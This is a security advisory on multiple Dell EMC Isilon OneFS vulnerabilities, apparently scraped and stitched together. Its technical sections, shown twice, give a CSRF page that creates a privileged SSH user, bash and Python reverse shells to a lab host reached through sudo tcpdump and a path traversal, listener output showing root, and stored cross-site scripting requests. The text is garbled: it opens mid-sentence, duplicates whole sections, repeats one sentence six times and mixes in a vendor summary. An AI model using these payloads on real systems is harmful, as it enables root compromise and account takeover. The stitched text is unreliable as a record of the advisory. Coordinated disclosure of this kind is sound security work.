new users with SSH access or re-mapping existing storage directories to allow read-write-execute access to all users. All requests are JSON-encoded, which in some cases might hinder exploitation of CSRF vulnerabilities. However, the application does not verify the content-type set. This allows an attacker to exploit the CSRF vulnerabilities by setting a text/plain content-type and sending the request body as JSON_PAYLOAD=ignored. The following proof of concept creates a new user and assigns him a new role with enough privileges to log in via SSH, configure identifies, manage authentication providers, configure the cluster and run the remote support tools. /----- <html> <body> <form id="addUser" target="_blank" action="https://192.168.1.11:8080/platform/1/auth/users?query_member_of=true&resolve_names=true&start=0&zone=System&provider=lsa-local-provider%3ASystem" method="POST" enctype="text/plain"> <input type="hidden" name="{"name":"pepito","enabled":true,"shell":"/bin/zsh","password_expires":false,"password":"pepito"}" value="" /> </form> <form id="addRole" target="_blank" action="https://192.168.1.11:8080/platform/1/auth/roles" method="POST" enctype="text/plain"> <input type="hidden" name="{"members":[{"name":"pepito","type":"user"}],"name":"pepito_role","privileges":[{"id":"ISI_PRIV_AUTH","name":"Auth","read_only":false},{"id":"ISI_PRIV_CLUSTER","name":"Cluster","read_only":false},{"id":"ISI_PRIV_REMOTE_SUPPORT","name":"Remote Support","read_only":false},{"id":"ISI_PRIV_LOGIN_SSH","name":"SSH","read_only":true}]}" value="" /> </form> <script> document.getElementById("addUser").submit(); window.setTimeout(function() { document.getElementById("addRole").submit() }, 1000); </script> </body> </html> -----/ 7.2. **Privilege escalation due to incorrect sudo permissions** [CVE-2018-1203] The compadmin user can run the tcpdump binary with root privileges via sudo. This allows for local privilege escalation, as tcpdump can be instructed to run shell commands when rotating capture files. /----- pepe-1$ id uid=11(compadmin) gid=0(wheel) groups=0(wheel),1(daemon) pepe-1$ cat /tmp/lala.sh #!/bin/bash bash -i >& /dev/tcp/192.168.1.66/8888 0>&1 -----/ Once the desired shell script is in place, the attacker can run tcpdump as follows to trigger the execution: /----- pepe-1$ sudo tcpdump -i em0 -G 1 -z /tmp/lala.sh -w dump tcpdump: WARNING: unable to contact casperd tcpdump: listening on em0, link-type EN10MB (Ethernet), capture size 65535 bytes /tmp/lala.sh: connect: Connection refused /tmp/lala.sh: line 3: /dev/tcp/192.168.1.66/8888: Connection refused /tmp/lala.sh: connect: Connection refused /tmp/lala.sh: line 3: /dev/tcp/192.168.1.66/8888: Connection refused -----/ As can be seen below, the script runs with root privileges: /----- $ nc -lvp 8888 Listening on [0.0.0.0] (family 0, port 8888) Connection from [192.168.1.11] port 8888 [tcp/*] accepted (family 2, sport 57692) bash: no job control in this shell [root@pepe-1 /compadmin]# id uid=0(root) gid=0(wheel) groups=0(wheel),5(operator),10(admin),20(staff),70(ifs) -----/ 7.3. **Privilege escalation via remote support scripts** [CVE-2018-1204] >From the documentation: "OneFS allows remote support through EMC Secure Remote Services (ESRS) which monitors your EMC Isilon cluster, and with your permission, allows remote access to Isilon Technical Support personnel to gather cluster data and troubleshoot issues." "After you enable remote support through ESRS, Isilon Technical Support personnel can request logs with scripts that gather EMC Isilon cluster data and then upload the data. The remote support scripts based on the Isilon isi_gather_info log-gathering tool are located in the /ifs/data/Isilon_Support/ directory on each node." "Additionally, isi_phone_home, a tool that focuses on cluster- and node-specific data, is enabled once you enable ESRS. This tool is pre-set to send information about your cluster to Isilon Technical Support on a weekly basis. You can disable or enable isi_phone_home from the OneFS command-line interface." As a cluster administrator or compadmin, it is possible to enable the remote support functionality, hence enabling the isi_phone_home tool via sudo. This tool is vulnerable to a path traversal when reading the script file to run, which would enable an attacker to execute arbitrary python code with root privileges. If remote support is not enabled, an attacker could perform the following operations in order to enable it: /----- pepe-1$ sudo isi network subnets create 1 ipv4 1 pepe-1$ sudo isi network pools create 1.0 pepe-1$ sudo isi remotesupport connectemc modify --enabled=yes --primary-esrs-gateway=10.10.10.10 --use-smtp-failover=no --gateway-access-pools=1.0 -----/ The isi_phone_home tool is supposed to run scripts located in the root-only writable directory /usr/local/isi_phone_home/script. However, the provided script name is used to construct the file path without sanitization, allowing an attacker to reference other locations. /----- def run_script(script_file_name): script_path = CFG.get('SCRIPTDIR') + '/' + script_file_name if os.path.isfile(script_path): cmd = 'python ' + script_path + ' 2>&1 ' command_thread = command.Command(cmd) exit_code, output = command_thread.run(int(CFG.get("SCRIPT_TIEMOUT"))) if exit_code: logging.error("Error: {0} running script: {1} ".format(str(exit_code), output)) else: logging.error("File: {0} list_file_name doesn't exist ".format(script_path)) -----/ The final step would be to create a malicious python script on any writable location and call it via the isi_phone_tool using sudo. Keep in mind that the previous steps are not required if the system does already have remote support enabled. /----- pepe-1$ cat /tmp/lala.py #!/usr/bin/env python import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("192.168.1.66",8888)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/sh","-i"]) pepe-1$ sudo /usr/bin/isi_phone_home --script-file ../../../../../tmp/lala.py -----/ /----- $ nc -lvp 8888 Listening on [0.0.0.0] (family 0, port 8888) Connection from [192.168.1.11] port 8888 [tcp/*] accepted (family 2, sport 56807) pepe-1# id uid=0(root) gid=0(wheel) groups=0(wheel),5(operator),10(admin),20(staff),70(ifs) -----/ 7.4. *Persistent cross-site scripting in the cluster description* [CVE-2018-1186] The description parameter of the /cluster/identity endpoint is vulnerable to cross-site scripting. After the cluster's description is updated, the payload will be executed every time the user opens the Web console. /----- PUT /platform/3/cluster/identity HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 61 Cookie: isisessid=91835dd1-49de-4d40-9f09-94f6d029df24; Connection: close {"description":"my cluster<img src=x onerror=\"alert(1)\"/>"} -----/ 7.5. **Persistent cross-site scripting in the Network Configuration page** [CVE-2018-1187] The description parameter of the /network/groupnets endpoint is vulnerable to cross-site scripting. After the description is updated, the payload will be executed every time the user opens the network configuration page. /----- POST /platform/4/network/groupnets HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: application/json Content-Length: 186 Cookie: isisessid=31f92221-15bb-421d-be00-d2bf42964c41; Connection: close {"description":"lala<script>alert(1)</script>","dns_cache_enabled":true,"dns_options":[],"dns_search":[],"dns_servers":[],"name":"pepito2","server_side_dns_search":false} -----/ 7.6. **Persistent cross-site scripting in the Authentication Providers page** [CVE-2018-1188] The realm parameter of the /auth/settings/krb5/realms endpoint is vulnerable to cross-site scripting. After the realm is updated, the payload will be executed every time the user opens the Kerberos tab of the Authentication Providers page. /----- POST /platform/1/auth/settings/krb5/realms HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: application/json Content-Length: 78 Cookie: isisessid=31f92221-15bb-421d-be00-d2bf42964c41; Connection: close {"is_default_realm":true,"kdc":[],"realm":"ASDASD<img src=x onerror=alert(1)"} -----/ 7.7. **Persistent cross-site scripting in the Antivirus page** [CVE-2018-1189] The name parameter of the /antivirus/policies endpoint is vulnerable to cross-site scripting. After the name is updated, the payload will be executed every time the user opens the Antivirus page. /----- POST /platform/3/antivirus/policies HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: application/json Content-Length: 172 Cookie: isisessid=c6903f55-43e7-42e2-b587-9f68142c3e06; Connection: close {"name":"pepe<img src=x onerror=\"alert(1)\"/>","description":"pepito","enabled":true,"force_run":false,"impact":null,"paths":["/ifs"],"recursion_depth":-1,"schedule":null} -----/ 7.8. **Persistent cross-site scripting in the Job Operations page** [CVE-2018-1201] The description parameter of the /job/policies endpoint is vulnerable to cross-site scripting. After the description is updated, the payload will be executed every time the user opens the Impact Policies section of the Job Operations page. /----- POST /platform/1/job/policies HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 210 Cookie: isisessid=8a5026c0-f045-4505-9d2b-ae83bc90f8ea; Connection: close {"name":"my policy","description":"<img src=x onerror=\"alert(1)\"/>","intervals":[{"begin":"Sunday 00:00","end":"Sunday 00:00","impact":"Low"},{"impact":"Low","begin":"Sunday 01:03","end":"Monday 01:01"}]} -----/ 7.9. **Persistent cross-site scripting in the NDMP page** [CVE-2018-1202] The name parameter of the /protocols/ndmp/users endpoint is vulnerable to cross-site scripting. After the name is updated, the payload will be executed every time the user opens the NDMP Settings section of the NDMP page. /----- POST /platform/3/protocols/ndmp/users HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 64 Cookie: isisessid=91835dd1-49de-4d40-9f09-94f6d029df24; Connection: close {"name":"<img src=x onerror=\"alert(1)\"/>","password":"123123"} -----/ 8. **Report Timeline** 2017-09-25: Core Security sent an initial notification to Dell EMC, including a draft advisory. 2017-09-26: Dell EMC confirmed reception and informed an initial response would be ready by October 5th. 2017-10-05: Dell EMC confirmed problem exists for all vulnerabilities reported except one, for which evaluation will be finalized soon. Dell EMC stated that, for the confirmed issues, a remediation plan will be provided by 10/16. 2017-10-05: Core Security thanked the follow up email. 2017-10-06: Dell EMC reported an update on one privilege escalation vulnerability reported, stating that 'ISI_PRIV_AUTH, and ISI_PRIV_ROLE both are equivalent to admin level access'. They said they will be updating the documentation to make it clearer. 2017-10-11: Core Security thanked for the clarification and confirmed that section will be removed from the final advisory. 2017-10-16: Core Security thanked the information and said it will analyze the proposals sent once all the data is available. 2017-10-19: Dell EMC sent a schedule for the remaining three reported vulnerabilities, with specific dates for every product's version. 2017-10-31: Core Security on the schedule sent, stating that fixing the vulnerabilities by June 2018 is unacceptable given current industry standards. Requested a review of the timeline or a thorough explanation that justifies such delay. 2017-11-01: Dell EMC answered back stating that after reviewing the original schedule, they said they believe they could have fixes ready for versions 8.0.x and 8.1.x by January 2018. Only caveat is the vulnerability 7.1 that might be pushed past January, although they said they think they could meet the January deadline. 2017-11-13: Core Security thanked Dell's review of the release dates and agreed on the proposed schedule, stating Core Security would like to publish a single advisory for all the vulnerabilities reported. Also requested CVE IDs for each of the issues. 2018-01-16: Core Security asked for a status update on the release date for the fixes since there was no update from Dell EMC. 2018-01-17: Dell EMC answered back stating they are awaiting confirmation from the product team about the exact dates of release. They said they will get back to us by the end of this week. Dell EMC also asked our GPG public key again. 2018-01-18: Core Security thanked for the update and sent the advisory's public GPG key. 2018-01-19: Dell EMC stated they are currently working on drafting their advisory and will send it back to us (including CVEs) once they have the necessary approvals. 2018-01-23: Dell EMC asked for our updated draft advisory. 2018-01-25: Dell EMC notified that the team are targeting to have the fix available by February 12th. Additionally, Dell will send its draft advisory by January 31th. 2018-01-29: Core Security thanked for the update and proposed February 14th as publication date. 2018-01-31: Dell EMC informed Core Security that they agreed to release on February 14th. They also provided CVE IDs for each vulnerability reported. 2018-02-01: Dell EMC sent its draft advisory. 2018-02-14: Advisory CORE-2017-0009 published. **References** [1] https://www.dellemc.com/en-us/storage/isilon/onefs-operating-system.htm 10. **About CoreLabs** CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. **About Core Security** Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur. Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com 12. **Disclaimer** The contents of this advisory are copyright (c) 2017 Core Security and (c) 2017 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

In Dell EMC Isilon OneFS, the compadmin is able to run tcpdump binary with root privileges. In versions between 8.1.0.0 - 8.1.0.1, 8.0.1.0 - 8.0.1.2, and 8.0.0.0 - 8.0.0.6, the tcpdump binary, being run with sudo, may potentially be used by compadmin to execute arbitrary code with root privileges. Dell EMC Isilon OneFS Contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Dell EMC Isilon OneFS is prone to the following multiple security vulnerabilities. 1. A cross-site request-forgery vulnerability 2. A local privilege escalation vulnerability 3. A remote privilege escalation vulnerability 4. Multiple HTML-injection vulnerabilities Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user or to gain elevated root privileges and perform certain unauthorized actions and gain access to the affected application. OneFS is an operating system that runs on it. Note: In Isilon OneFS, running in compadmin mode, compadmin user is less privileged than the nodes' root users. CVSS v3 Base Score: 6.7 (AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H) Path Traversal Vulnerability (CVE-2018-1204) Dell EMC Isilon OneFS is affected by a path traversal vulnerability in the isi_phone_home tool. A malicious administrator may potentially inject arbitrary HTML or JavaScript code in the user's browser session in the context of the OneFS website. A malicious administrator may potentially inject arbitrary HTML or JavaScript code in the user's browser session in the context of the OneFS website. A malicious administrator may potentially inject arbitrary HTML or JavaScript code in the user's browser session in the context of the OneFS website. A malicious administrator may potentially inject arbitrary HTML or JavaScript code in the user's browser session in the context of the OneFS website. A malicious administrator may potentially inject arbitrary HTML or JavaScript code in the user's browser session in the context of the OneFS website. A malicious administrator may potentially inject arbitrary HTML or JavaScript code in the user's browser session in the context of the OneFS website. CVSS v3 Base Score: 5.9 (AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L) Cross-Site Request Forgery Vulnerability (CVE-2018-1213) Dell EMC Isilon OneFS is affected by a cross-site request forgery vulnerability. A malicious user may potentially exploit these vulnerability to send unauthorized requests to the server on behalf of authenticated users of the application. CVSS v3 Base Score: 8.8 (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H) Resolution: The following Dell EMC Isilon OneFS maintenance releases addresses these vulnerabilities (except for CVE-2018-1213): Dell EMC Isilon OneFS 8.1.0.2 Patches are available for the below versions: Patch-213283 for OneFS 8.1.0.2 (CVE-2018-1213 only) Patch-217638 for OneFS 8.1.0.1 (all CVEs) Patch-213281 for OneFS 8.1.0.0 (all CVEs) Patch-213280 for OneFS 8.0.1.2 (all CVEs) Patch-213278 for OneFS 8.0.0.6 (all CVEs) Patch-217637 for OneFS 8.0.0.5 (all CVEs) Patch-211980 for OneFS 8.0.0.4 (all CVEs) IMPORTANT: If you update Isilon OneFS with a patch from this list, and you are using Insight IQ, you must upgrade to Insight IQ 4.1.2 prior to installing the patch. This advisory will be updated when fixes are available for additional versions. -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBCAAGBQJar7X8AAoJEHbcu+fsE81ZnVsH/RkfP2XUz4sHV2uQofuZR2bJ 319oyT9XVWUsOwCtQQ2ty/rolXHlO/B1viIq5OYJo4sTrN9s8dupz/Patek9HdiT RR0nvSVEgLM4C8NwB30hwJO8luuO8RDQUc3BQnSo6Vy8b1zM9F7A+yMZgseUoOaW u5jduNB8kvTAAyK4SnujqyBE4eT193x2yxAr15VoMRNFlmmu+S8GHpcCMoE0CDRt 05zhC6wCelN9BA0Bf7D533ffigfP8QAe+zw/OaQgQcEmoe5ys9aaHp2EJaAF5UZN Eh5JtXuwGX3dq0GDdVgbrA0ZlQlLConpBHhZEoIn99YF4MHpbp9l3QbeEYUS2ko= =c/8F -----END PGP SIGNATURE----- . **Advisory Information** Title: Dell EMC Isilon OneFS Multiple Vulnerabilities Advisory ID: CORE-2017-0009 Advisory URL: http://www.coresecurity.com/advisories/dell-emc-isilon-onefs-multiple-vulnerabilities Date published: 2018-02-14 Date of last update: 2018-02-14 Vendors contacted: Dell EMC Release mode: Coordinated release 2. **Vulnerability Information** Class: Cross-Site Request Forgery [CWE-352], Improper Privilege Management [CWE-269], Improper Privilege Management [CWE-269], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-1213, CVE-2018-1203, CVE-2018-1204, CVE-2018-1186, CVE-2018-1187, CVE-2018-1188, CVE-2018-1189, CVE-2018-1201, CVE-2018-1202 3. **Vulnerability Description** Dell EMC's website states that:[1] The EMC Isilon scale-out NAS storage platform combines modular hardware with unified software to harness unstructured data. Powered by the OneFS operating system, an EMC Isilon cluster delivers a scalable pool of storage with a global namespace. The platform's unified software provides centralized Web-based and command-line administration to manage the following features: - A cluster that runs a distributed file system - Scale-out nodes that add capacity and performance - Storage options that manage files and tiering - Flexible data protection and high availability - Software modules that control costs and optimize resources Multiple vulnerabilities were found in the Isilon OneFS Web console that would allow a remote attacker to gain command execution as root. **Vulnerable Packages** . Dell EMC Isilon OneFS version 8.1.1.0 (CVE-2018-1203, CVE-2018-1204) . Dell EMC Isilon OneFS versions between 8.1.0.0 - 8.1.0.1 (all CVEs) . Dell EMC Isilon OneFS versions between 8.0.1.0 - 8.0.1.2 (all CVEs) . Dell EMC Isilon OneFS versions between 8.0.0.0 - 8.0.0.6 (all CVEs) . Dell EMC Isilon OneFS versions 7.2.1.x (CVE-2018-1186, CVE-2018-1188, CVE-2018-1201, CVE-2018-1204, CVE-2018-1213) . Dell EMC Isilon OneFS version 7.1.1.11 (CVE-2018-1186, CVE-2018-1201, CVE-2018-1202, CVE-2018-1204, CVE-2018-1213) Other products and versions might be affected, but they were not tested. **Vendor Information, Solutions and Workarounds** Dell EMC provided a link to the Download for Isilon OneFS page which contains the patches: . https://support.emc.com/downloads/15209_Isilon-OneFS 6. **Credits** These vulnerabilities were discovered and researched by Ivan Huertas and Maximiliano Vidal from Core Security Consulting Services. The publication of this advisory was coordinated by Alberto Solino from Core Advisories Team. **Technical Description / Proof of Concept Code** The Web console contains several sensitive features that are vulnerable to cross-site request forgery. We describe this issue in section 7.1. Sections 7.2 and 7.3 show two vectors to escalate privileges to root. Various persistent cross-site scripting issues are presented in the remaining sections (7.4, 7.5, 7.6, 7.7, 7.8, 7.9). **Cross-site request forgery leading to command execution** [CVE-2018-1213] There are no anti-CSRF tokens in any forms on the Web interface. This would allow an attacker to submit authenticated requests when an authenticated user browses an attacker-controlled domain. The Web console contains a plethora of sensitive actions that can be abused, such as adding new users with SSH access or re-mapping existing storage directories to allow read-write-execute access to all users. All requests are JSON-encoded, which in some cases might hinder exploitation of CSRF vulnerabilities. However, the application does not verify the content-type set. This allows an attacker to exploit the CSRF vulnerabilities by setting a text/plain content-type and sending the request body as JSON_PAYLOAD=ignored. The following proof of concept creates a new user and assigns him a new role with enough privileges to log in via SSH, configure identifies, manage authentication providers, configure the cluster and run the remote support tools. /----- <html> <body> <form id="addUser" target="_blank" action="https://192.168.1.11:8080/platform/1/auth/users?query_member_of=true&resolve_names=true&start=0&zone=System&provider=lsa-local-provider%3ASystem" method="POST" enctype="text/plain"> <input type="hidden" name="{"name":"pepito","enabled":true,"shell":"/bin/zsh","password_expires":false,"password":"pepito"}" value="" /> </form> <form id="addRole" target="_blank" action="https://192.168.1.11:8080/platform/1/auth/roles" method="POST" enctype="text/plain"> <input type="hidden" name="{"members":[{"name":"pepito","type":"user"}],"name":"pepito_role","privileges":[{"id":"ISI_PRIV_AUTH","name":"Auth","read_only":false},{"id":"ISI_PRIV_CLUSTER","name":"Cluster","read_only":false},{"id":"ISI_PRIV_REMOTE_SUPPORT","name":"Remote Support","read_only":false},{"id":"ISI_PRIV_LOGIN_SSH","name":"SSH","read_only":true}]}" value="" /> </form> <script> document.getElementById("addUser").submit(); window.setTimeout(function() { document.getElementById("addRole").submit() }, 1000); </script> </body> </html> -----/ 7.2. This allows for local privilege escalation, as tcpdump can be instructed to run shell commands when rotating capture files. /----- pepe-1$ id uid=11(compadmin) gid=0(wheel) groups=0(wheel),1(daemon) pepe-1$ cat /tmp/lala.sh #!/bin/bash bash -i >& /dev/tcp/192.168.1.66/8888 0>&1 -----/ Once the desired shell script is in place, the attacker can run tcpdump as follows to trigger the execution: /----- pepe-1$ sudo tcpdump -i em0 -G 1 -z /tmp/lala.sh -w dump tcpdump: WARNING: unable to contact casperd tcpdump: listening on em0, link-type EN10MB (Ethernet), capture size 65535 bytes /tmp/lala.sh: connect: Connection refused /tmp/lala.sh: line 3: /dev/tcp/192.168.1.66/8888: Connection refused /tmp/lala.sh: connect: Connection refused /tmp/lala.sh: line 3: /dev/tcp/192.168.1.66/8888: Connection refused -----/ As can be seen below, the script runs with root privileges: /----- $ nc -lvp 8888 Listening on [0.0.0.0] (family 0, port 8888) Connection from [192.168.1.11] port 8888 [tcp/*] accepted (family 2, sport 57692) bash: no job control in this shell [root@pepe-1 /compadmin]# id uid=0(root) gid=0(wheel) groups=0(wheel),5(operator),10(admin),20(staff),70(ifs) -----/ 7.3. **Privilege escalation via remote support scripts** [CVE-2018-1204] >From the documentation: "OneFS allows remote support through EMC Secure Remote Services (ESRS) which monitors your EMC Isilon cluster, and with your permission, allows remote access to Isilon Technical Support personnel to gather cluster data and troubleshoot issues." "After you enable remote support through ESRS, Isilon Technical Support personnel can request logs with scripts that gather EMC Isilon cluster data and then upload the data. The remote support scripts based on the Isilon isi_gather_info log-gathering tool are located in the /ifs/data/Isilon_Support/ directory on each node." "Additionally, isi_phone_home, a tool that focuses on cluster- and node-specific data, is enabled once you enable ESRS. This tool is pre-set to send information about your cluster to Isilon Technical Support on a weekly basis. You can disable or enable isi_phone_home from the OneFS command-line interface." As a cluster administrator or compadmin, it is possible to enable the remote support functionality, hence enabling the isi_phone_home tool via sudo. If remote support is not enabled, an attacker could perform the following operations in order to enable it: /----- pepe-1$ sudo isi network subnets create 1 ipv4 1 pepe-1$ sudo isi network pools create 1.0 pepe-1$ sudo isi remotesupport connectemc modify --enabled=yes --primary-esrs-gateway=10.10.10.10 --use-smtp-failover=no --gateway-access-pools=1.0 -----/ The isi_phone_home tool is supposed to run scripts located in the root-only writable directory /usr/local/isi_phone_home/script. However, the provided script name is used to construct the file path without sanitization, allowing an attacker to reference other locations. /----- def run_script(script_file_name): script_path = CFG.get('SCRIPTDIR') + '/' + script_file_name if os.path.isfile(script_path): cmd = 'python ' + script_path + ' 2>&1 ' command_thread = command.Command(cmd) exit_code, output = command_thread.run(int(CFG.get("SCRIPT_TIEMOUT"))) if exit_code: logging.error("Error: {0} running script: {1} ".format(str(exit_code), output)) else: logging.error("File: {0} list_file_name doesn't exist ".format(script_path)) -----/ The final step would be to create a malicious python script on any writable location and call it via the isi_phone_tool using sudo. Keep in mind that the previous steps are not required if the system does already have remote support enabled. /----- pepe-1$ cat /tmp/lala.py #!/usr/bin/env python import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("192.168.1.66",8888)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/sh","-i"]) pepe-1$ sudo /usr/bin/isi_phone_home --script-file ../../../../../tmp/lala.py -----/ /----- $ nc -lvp 8888 Listening on [0.0.0.0] (family 0, port 8888) Connection from [192.168.1.11] port 8888 [tcp/*] accepted (family 2, sport 56807) pepe-1# id uid=0(root) gid=0(wheel) groups=0(wheel),5(operator),10(admin),20(staff),70(ifs) -----/ 7.4. *Persistent cross-site scripting in the cluster description* [CVE-2018-1186] The description parameter of the /cluster/identity endpoint is vulnerable to cross-site scripting. After the cluster's description is updated, the payload will be executed every time the user opens the Web console. /----- PUT /platform/3/cluster/identity HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 61 Cookie: isisessid=91835dd1-49de-4d40-9f09-94f6d029df24; Connection: close {"description":"my cluster<img src=x onerror=\"alert(1)\"/>"} -----/ 7.5. **Persistent cross-site scripting in the Network Configuration page** [CVE-2018-1187] The description parameter of the /network/groupnets endpoint is vulnerable to cross-site scripting. After the description is updated, the payload will be executed every time the user opens the network configuration page. /----- POST /platform/4/network/groupnets HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: application/json Content-Length: 186 Cookie: isisessid=31f92221-15bb-421d-be00-d2bf42964c41; Connection: close {"description":"lala<script>alert(1)</script>","dns_cache_enabled":true,"dns_options":[],"dns_search":[],"dns_servers":[],"name":"pepito2","server_side_dns_search":false} -----/ 7.6. **Persistent cross-site scripting in the Authentication Providers page** [CVE-2018-1188] The realm parameter of the /auth/settings/krb5/realms endpoint is vulnerable to cross-site scripting. After the realm is updated, the payload will be executed every time the user opens the Kerberos tab of the Authentication Providers page. /----- POST /platform/1/auth/settings/krb5/realms HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: application/json Content-Length: 78 Cookie: isisessid=31f92221-15bb-421d-be00-d2bf42964c41; Connection: close {"is_default_realm":true,"kdc":[],"realm":"ASDASD<img src=x onerror=alert(1)"} -----/ 7.7. **Persistent cross-site scripting in the Antivirus page** [CVE-2018-1189] The name parameter of the /antivirus/policies endpoint is vulnerable to cross-site scripting. After the name is updated, the payload will be executed every time the user opens the Antivirus page. /----- POST /platform/3/antivirus/policies HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: application/json Content-Length: 172 Cookie: isisessid=c6903f55-43e7-42e2-b587-9f68142c3e06; Connection: close {"name":"pepe<img src=x onerror=\"alert(1)\"/>","description":"pepito","enabled":true,"force_run":false,"impact":null,"paths":["/ifs"],"recursion_depth":-1,"schedule":null} -----/ 7.8. **Persistent cross-site scripting in the Job Operations page** [CVE-2018-1201] The description parameter of the /job/policies endpoint is vulnerable to cross-site scripting. After the description is updated, the payload will be executed every time the user opens the Impact Policies section of the Job Operations page. /----- POST /platform/1/job/policies HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 210 Cookie: isisessid=8a5026c0-f045-4505-9d2b-ae83bc90f8ea; Connection: close {"name":"my policy","description":"<img src=x onerror=\"alert(1)\"/>","intervals":[{"begin":"Sunday 00:00","end":"Sunday 00:00","impact":"Low"},{"impact":"Low","begin":"Sunday 01:03","end":"Monday 01:01"}]} -----/ 7.9. **Persistent cross-site scripting in the NDMP page** [CVE-2018-1202] The name parameter of the /protocols/ndmp/users endpoint is vulnerable to cross-site scripting. After the name is updated, the payload will be executed every time the user opens the NDMP Settings section of the NDMP page. /----- POST /platform/3/protocols/ndmp/users HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 64 Cookie: isisessid=91835dd1-49de-4d40-9f09-94f6d029df24; Connection: close {"name":"<img src=x onerror=\"alert(1)\"/>","password":"123123"} -----/ 8. **Report Timeline** 2017-09-25: Core Security sent an initial notification to Dell EMC, including a draft advisory. 2017-09-26: Dell EMC confirmed reception and informed an initial response would be ready by October 5th. 2017-10-05: Dell EMC confirmed problem exists for all vulnerabilities reported except one, for which evaluation will be finalized soon. Dell EMC stated that, for the confirmed issues, a remediation plan will be provided by 10/16. 2017-10-05: Core Security thanked the follow up email. 2017-10-06: Dell EMC reported an update on one privilege escalation vulnerability reported, stating that 'ISI_PRIV_AUTH, and ISI_PRIV_ROLE both are equivalent to admin level access'. They said they will be updating the documentation to make it 